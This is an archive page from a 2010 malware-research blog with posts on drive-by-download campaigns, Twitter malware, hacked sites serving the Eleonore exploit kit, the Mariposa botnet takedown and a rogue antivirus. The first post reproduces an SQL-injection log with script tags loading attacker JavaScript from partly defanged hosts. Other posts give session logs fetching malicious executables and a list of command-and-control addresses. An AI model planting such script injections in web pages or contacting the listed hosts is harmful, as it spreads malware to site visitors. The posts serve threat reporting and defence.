Author Archive for admin

11
Jun

Robint.us SQLi Utilizing CVE-2010-1297 Exploit

By lithium Comments
Categories: Exploit, Hack, IFRAME, SQL Injection, SQLi, Video and Vulnerabilities

The crew behind the recent massive SQLi is currently exploiting  the latest CVE-2010-1297 vulnerability in its drive-by-download attacks.  Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version.  Check that out here:

We recommend patching Adobe and then installing Cloud Antivirus to prevent any future 0day attacks.

Here are some logs of our most recent encounter:

Session traffic:

GET hxxp://2677.in/cnzz.html

200 OK (text/html)

GET hxxp://2677.in/ie.html

200 OK (text/html)

GET hxxp://s11.cnzz.com/stat.php?id=1990191&web_id=1990191

200 OK (text/html)

GET hxxp://2677.in/log.txt

200 OK (text/plain)

GET hxxp://2677.in/anhey.swf

200 OK (application/x-shockwave-flash)

GET hxxp://2677.in/anhey.swf

206 Partial Content (application/x-shockwave-flash)

GET

hxxp://zs13.cnzz.com/stat.htm?id=1990191&r=http%3A//www.generationdb.com/&lg

=en-us&ntime=0.14859300%201276289711&repeatip=0&rtime=0&cnzz_eid=82761217-12

76289711-http%3A//www.generationdb.com/&showp=800×600&st=1276292642&sin=http

%3A//www.generationdb.com/&res=0

200 OK (image/gif)

GET hxxp://2677.in/log.exe

200 OK (application/octet-stream)

Injection log:

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_37726110_lego.jpg< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_37726110_lego.jpg< script src=http://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’7′”

target=”_self”  >    We are all  < /a  >  … < br  /  >  Category: Groups,<

br /  >  Location: USA< script src=hxxp://2677.in/yahoo.js  >  < /script  > < /td  > < /tr  > < tr  > < td colspan=”2″  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >  < tr  >

< td  >

< table width=”96%” border=”0″ align=”center” cellpadding=”0″

cellspacing=”0″  >

< tr  >

< td colspan=”2″  >   < img alt=”" src=”images/5×5.gif” width=”5″ height=”8″

/  >  < /td  >

< /tr  >

< tr  >

< td align=”center” class=”hoverbox”  >   < a href=”#”  >   < img

src=’upload/community/moresmall_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" /  >  < img src=’upload/community/large_2065474113_IMG_4127.JPG< script src=hxxp://ww.robint.us/u.js  >  < /script  >  < script src=hxxp://2677.in/yahoo.js  >  < /script  >  ‘ alt=”" class=”preview” /  > < /a  >  < /td  >

< td width=”55%” valign=”top” class=”category”  >

< a href=”unregisteredcommunity.aspx?Com_id=’6′”

target=”_self”  >    Technosoft < /a  >  … < br  /  >  Category:

Business,< br /  >  Location: India< script src=hxxp://2677.in/yahoo.js  > < /script  >  < /td  > < /tr  > < tr  > < td colspan=”2″ class=”line”  > —————————————–< /td  > < /tr  > < /table  > < /td  >

< /tr  >

< /table  >

21
May

Twitter Trending Topic Attack

By lithium Comments
Categories: Hack, Malicious Domains, Malicious Links, Malware and Twitter

Almost a full year has passed since we discovered the first trending topic attack on Twitter.  This time the attack came back in the same fashion, but it was much less aggressive than the prior attack thanks to the swiftly acting Twitter security team.

In this latest attack, the tweet messages were coupled with the trending topic items such as Justin Bieber, Oil Spill, and Official Twitter App.   The tweets all contained the text “haha this is the funniest video ive EVER SEEN!” followed by a link to the malware campaign.

In the following image, you can see the results of a search taken shortly after the attack started.  As you can see, the accounts were communicating via the Twitter API, so it’s safe to assume that the cyber criminals behind the attack used some sort of script to make it all happen.

Twitter_results

Clicking any of the URLs starts the redirection process to a website where a malicious file is downloaded using the technique known as “drive by download”, which runs this file automatically in the affected computer, without user’s awareness.

The malware site used for the attack is hxxp://pc-tv.tv/stickam/index2.html

In the following image you can see how it seems that a java complement is being loaded, which is necessary to view the video:

Twitter_java_site

However, if we look at the code of this website, you can see how it’s actually calling an EXE file, which belongs to the malware. It has been detected as W32/Lolbot.B.worm.

The code is the following:

Twitter_code

10
May

Twitter hacked by “Turkish Hacker”

By lithium Comments
Categories: Hack, Twitter and Vulnerabilities

This morning I logged into my twitter account and noticed something strange.  My Twitter follower count moved from over 5500 followers to zero instantaneously between reloads!  Apparently, a Turkish hacker was able to exploit a bug in the Twitter website which allowed the hacker to force other Twitter accounts to automatically follow him and suddenly every Twitter account had their follower count rolled back to zero.  Many Twitter users immediately tweeted about the issue and several celebrities chimed in on the issue:

Ashton Kutcher: twitter is being hacked by some turkish hacker. haha I have 0 followers.

Justin Bieber: so i woke up here in LA and Twitter has been hacked. Turns out I am no longer popular … hackers i send a warning…u have now pissed off over 2 million teenage girls. They are more dangerous than Navy Seals.

Jim Carrey: Imagine if this hacker put his/her talent 2 some worthy use. They could 1 day have more than a false sense of superiority. They’d #BOING ;^>

Alyssa Milano: Ummmmm….. Where did my followers go @Twitter?

Mark Indelicato: It says that I have 0 followers……

Stephen Collins (7th Heaven): According 2 Twitter they’ve fixed a bug/hack that re-set following/follower #s to 0. Scary. So far, my acct isn’t re-set. Holding breath.

Joe Jonas: Wait.. So this means I have to “talk” to my friends?

The bug was first discovered in a Turkish website, which I have attempted to translate (any of our Turkish viewers willing to submit a better translation?) with Google Translate:

I know that I do not think this bug. twiti accept that start with a code that identifies the code as written should be. twitter is too flat or system that is quite a simple system they write, next to facebook. entered with the data sent by the same function, they showed twiti. After all, if you want to send a data in a way and this is a bug if you send a code to be written against it, by entering a twit you’ve done the easy way ha, ha hard way. When the easy way to write the entire code is perceived as most likely. I would not do so even if I was, anyway.

hide profile sent to people who question the follower They’ll accept bids for your keywords, if you request a follow no action will be taken. so simple.

note: I’m speaking without knowing, I have no programming knowledge about the particles. I like to rant, swh.

It’s still a bit unclear as to who this Turkish Hacker is, although it may be safe to assume that one of the now suspended accounts (@borakrc) in the above Turkish blog is him.  The Twitter staff has acknowledged the bug and has already taken remediation steps to fix the error.

07
May

PHPnuke.org hacked via iframe injection

By lithium Comments
Categories: Database Update

PHP-Nuke, a popular web based portal and content management solution written in PHP has been criticized in the past for the slew of security vulnerabilities affecting its platform.  Today, the main PHP-Nuke website has been, well, nuked.  A malicious iframe has been injected into the main site (still active) and like the previous attack on the US Treasury Website, this campaign also uses the Eleonore exploit pack to distribute the malware.

Upon visiting the main PHP-Nuke website (still active), the iframe redirects through a series of exploit attempts, which include Adobe Collab overflow, getIcon, and doc.media.newPlayer vulnerabilities.

malicious iframe redirector - php-nukemalicious iframe redirector – php-nuke

After the initial iframe redirection, the second iframe redirection starts and statistics servers (hosted in Russia) are accessed.

second stage iframe redirection/statistic collectionsecond stage iframe redirection/statistic collection

After the second stage is completed, the third stage starts and the exploitation attempts begin.

3rd stage - obfuscated code - exploitation attempts3rd stage – obfuscated code – exploitation attempts

If the various exploit attempts are successful, the CI.A Trojan is executed on the victims computer.

Lately, we’ve noticed an uptick in usage of the Eleonore exploit kit and judging from the site variable in the URL (E.g. site=phpnuke.org), we’re guessing that this isn’t the only site they are targeting in this attack.

06
May

Inside Mariposa – The Largest Botnet Takedown in History

By lithium Comments
Categories: Database Update

PDF IconDownload the PDF version here.

In May 2009, Defence Intelligence, a private information security firm based in Canada began investigating a suspicious new malware sample that was communicating with Command & Control (C&C) servers located in Spain. “Mariposa,” the Spanish word for butterfly, was given to the botnet by Defence Intelligence researchers after several months of probing. Early suspicion was accurate because further investigation eventually led to the discovery of 13 million newly infected machines communicating with the C&C servers. This rapid growth urgently signaled the need for an international coalition to conduct the research, investigation, and takedown efforts of the largest botnet ever recorded in history.

The result was The Mariposa Working Group, comprised of several experts in the Information Security sector including Defence Intelligence, Panda Security, the Georgia Tech Information Security Center, the FBI and the Spanish Civil Guard.  The focus of the group was to identify and eradicate the botnet, as well as bring the cyber criminals to justice.

During the initial stages of research, the Mariposa Working Group discovered that the Mariposa botnet was masterminded by an amateur-run group of several spirited script kiddies named Días de Pesadilla (DDP), which translates to “Nightmare Days Team.”  Uncovered underground forum communication showed that instead of building a complex self-coded botnet infrastructure, the DDP team leveraged the underground community to buy the tools that they needed to build the 13 million strong botnet. In fact, the botnet operators even leveraged the widely popular Zeus crimeware kit, which is a do-it-yourself tool used by many amateur botnet operators today.

The DDP team also bought malware tools (crypters, packers, kits, etc.) on these forums to sell to other members. dDoS services, Adware/Toolbar installs and Botnet rental (primarily for credential harvesting), were among the favorites and it was through this underground forum that the Mariposa botnet became a financially viable tool for the cyber criminals.

The underground communication also enabled the Mariposa Working Group to identify the botnet leader, who was only known by the handle “Netkairo.” Tracking the operator became very difficult, as he only used anonymous VPN services to connect to the botnet infrastructure. The chances of catching the operator were slim, so a more aggressive approach was taken to cease all activity.  On December 23rd, 2009, the Mariposa botnet was effectively taken over by rerouting the command and control servers DNS records to a sinkhole. Nearly 13 million infected machines immediately began sending beacon signals back to the sinkhole and it was this time that the Mariposa Working Group identified infections in government computers, universities and more than half of the nation’s Fortune 1000 companies.

In a last ditch effort to regain control of the botnet, Netkairo frantically connected to the botnet infrastructure using his home broadband connection. He was able to temporarily regain control of the botnet and subsequently launch a denial of service attack on Defence Intelligence, nearly taking an entire ISP down in the process. This single action proved to be a fatal mistake and the linchpin in unraveling the entire DDP team. The Mariposa Working Group worked in conjunction with Netkairo’s ISP in identifying the botnet masters’ whereabouts and on February 3rd, 2010 the Spanish Civil Guard quickly moved to arrest the 31-year-old Spaniard at his home in the Basque region of Spain. The investigation of Netkairo’s personal computer led to the discovery of various types of stolen data including bank account details, credit card numbers, user names and passwords from approximately 800,000 victims, as well as evidence which led to the capture of another two Spanish members of the gang: J.P.R., 30,  a.k.a. “jonyloleante”, and  J.B.R., 25, a.k.a. “ostiator,” who were both arrested on February 24th, 2010.

Victims of Mariposa include home users, companies, government agencies and universities in more than 190 countries.  Christopher Davis, CEO of Defence Intelligence, illustrates the significance of these infections with this one statement: “It would be easier for me to provide a list of the Fortune 1000 companies that weren’t compromised, rather than the long list of those who were.”

The investigation is still ongoing, but preliminary calculations of the losses through fraud, financial theft, data loss and cleanup costs are estimated to be in the millions of dollars.  Analysis of Netkairo’s hard disks revealed a complex network of suppliers offering a range of services including hacking of servers to be used as control servers, encryption services to make the bots undetectable by antivirus programs, anonymous VPN connections to administer the botnet, etc.  There is also a similarly complex network of clients, prepared to rent part of the botnet, to buy stolen credit cards, or pay for the installation of toolbars. The gang also stole directly from bank accounts, using money mules in the United States and Canada, and laundered money through online poker games.

Cases like Mariposa demonstrate the growing trend of the amateur run botnets. Do-it-yourself kits like ZeuS, SpyEye, Elenore, and many others are widely available on the Internet underground and it’s these tools that allowed the amateurs behind the Mariposa botnet to build a 13 million strong victim pool. Fortunately, as cybercriminal attacks continue to increase in frequency and sophistication, information is gleaned for security vendors to develop new tools and law enforcement agencies to develop new strategies for bringing these criminals to justice.

04
May

United States Treasury Website Hacked to Spread Eleonore Exploit Pack Malware

By lithium Comment
Categories: Database Update

Time and time again we talk about how amateur and professional hackers alike are able to use automated toolkits which can identify security vulnerabilities on a computer and exploit them with little or no technical skill necessary for the cyber criminal.  The  spirited script kiddies behind these kits have been running  havoc on the Internet, as many of the kits available can be downloaded in underground forums for free.   Today, we came across an embedded iframe inside of the Department of Treasury website.   This iframe (pictured below) is used to silently load one of the elenore exploit kits main URL’s, which in turn determines what’s the best available exploitation method for the browser accessing the site.

US Treasury - Injected iframeUS Treasury Website – Injected iframe

Upon accessing the US Treasury website (treas.gov, bep.gov, or moneyfactory.gov), the iframe silently redirects victims through statistic servers and exploit packs which will carry the victim onto the second stage of the attack.

US Treasury Website Hack (Session Log)US Treasury Website Hack (Session Log)

In my case, the exploit kit figured that Java was the best method of infecting my test machine,  although several exploitation methods (mainly PDF) are used by these kits.    It’s still unclear what the original entry point was into the US Treasury website, and I don’t suspect that the US Government will release detailed report about the compromise, but these threats usually make their way onto websites that have outdated server software, web applications, and/or through web application security vulnerabilities such as SQL injection.

After you are infected, your web browser will start redirecting you to ads and other nasty things, such as Rogueware:

Rogueware spread by US GOV website

I would like to use this post to remind you all to update your web applications and web servers just as frequently as you would your own computer. Doing so will help prevent your website from being hacked and used to propagate these threats on the Internet.  You, your visitors, and many others browsing the Internet will remain one step closer to a safer browsing experience on the Internet.

11
Mar

Demonstrating the latest IE vulnerability

By lithium Comments
Categories: Database Update

Yesterday, Microsoft issued a security advisory for an unpatched and actively exploited invalid reference pointer vulnerability in the Internet Explorer 6 and 7 web browsers. In the attack we observed, the exploit code will load the TDSS.CQ trojan, which is designed to steal personal and sensitive data.  Only versions 6 and 7 of Internet Explorer are vulnerable, but you can take additional steps to avoid it by using an alternative browser such as, Firefox, Opera, or by upgrading to Internet Explorer 8.

I went ahead and put together a little video to show you all how the exploit works:

Note: Originally posted on the PandaLabs blog.

25
Jan

New Rogue: Total Defender

By lithium Comment
Categories: Database Update

PandaLabs reports that a new Rogue Antivirus program called Total Defender appeared over the weekend.


The following data is included for informational purposes only. Please do not attempt to view or download files from the website.

Domain: Total-Defender. com
IP: 94.247.2.41
Country: Latvia
Host: DATORU EXPRESS SERVISS Ltd.
Organization: ZlKon

File: total-defender-setup.exe

Total Defender Rogue Antivirus

Connects to:

0    200    HTTP    94.247.2.41    /ck.php    21
1    200    HTTP    94.247.2.41    /tdd.php?i=1
2    200    HTTP    94.247.2.41    /ck.php
3    301    HTTP    94.247.2.41    /tdp.php?ak=24DIGITHASH
4    200    HTTP    CONNECT    pp-pay.net:443
5    200    HTTP    CONNECT    pp-pay.net:443
6    200    HTTP    CONNECT    pp-pay.net:443
7    200    HTTP    CONNECT    bill-support.com:443

Additional Info:

An interesting thing we noticed is that the Rogue did not attempt to scare us into purchasing it, rather telling us that the computer was secure after the scan.  The Rogue authors are probably doing this to keep a high amount of Rogue installations active for the purposes of data theft or for hire services.

Total Defender Rogue Antivirus

« Previous Entries
SANDBOX

SANDBOX ANALYSIS PAGE




 

September 2010
M T W T F S S
« Aug    
 12345
6789101112
13141516171819
20212223242526
27282930